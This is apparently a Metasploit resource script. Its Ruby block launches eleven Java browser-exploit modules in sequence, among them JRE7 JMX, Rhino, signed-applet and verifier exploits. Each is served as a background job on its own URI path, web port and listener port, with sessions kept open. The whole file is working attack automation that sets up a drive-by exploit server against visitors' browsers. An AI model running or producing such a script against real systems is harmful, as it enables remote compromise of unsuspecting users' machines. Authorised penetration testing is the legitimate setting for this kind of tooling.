<ruby>
begin
run_single("set ExitOnSession false")
run_single("use exploit/multi/browser/java_jre17_jmxbean_2")
run_single("set URIPATH /java_jre17_jmxbean_2")
run_single("set SRVPORT 8082")
run_single("set LPORT 8889")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_method_handle")
run_single("set URIPATH /java_jre17_method_handle")
run_single("set SRVPORT 8083")
run_single("set LPORT 8890")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_provider_skeleton")
run_single("set URIPATH /java_jre17_provider_skeleton")
run_single("set SRVPORT 8084")
run_single("set LPORT 8891")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_reflection_types")
run_single("set URIPATH /java_jre17_reflection_types")
run_single("set SRVPORT 8085")
run_single("set LPORT 8892")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_rhino")
run_single("set URIPATH /java_rhino")
run_single("set SRVPORT 8086")
run_single("set LPORT 8893")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_rmi_connection_impl")
run_single("set URIPATH /java_rmi_connection_impl")
run_single("set SRVPORT 8087")
run_single("set LPORT 8894")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_setdifficm_bof")
run_single("set URIPATH /java_setdifficm_bof")
run_single("set SRVPORT 8088")
run_single("set LPORT 8895")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_signed_applet")
run_single("set URIPATH /java_signed_applet")
run_single("set SRVPORT 8089")
run_single("set LPORT 8896")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_storeimagearray")
run_single("set URIPATH /java_storeimagearray")
run_single("set SRVPORT 8090")
run_single("set LPORT 8897")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_trusted_chain")
run_single("set URIPATH /java_trusted_chain")
run_single("set SRVPORT 8091")
run_single("set LPORT 8898")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_verifier_field_access")
run_single("set URIPATH /java_verifier_field_access")
run_single("set SRVPORT 8092")
run_single("set LPORT 8899")
run_single("exploit -j")
end
</ruby>
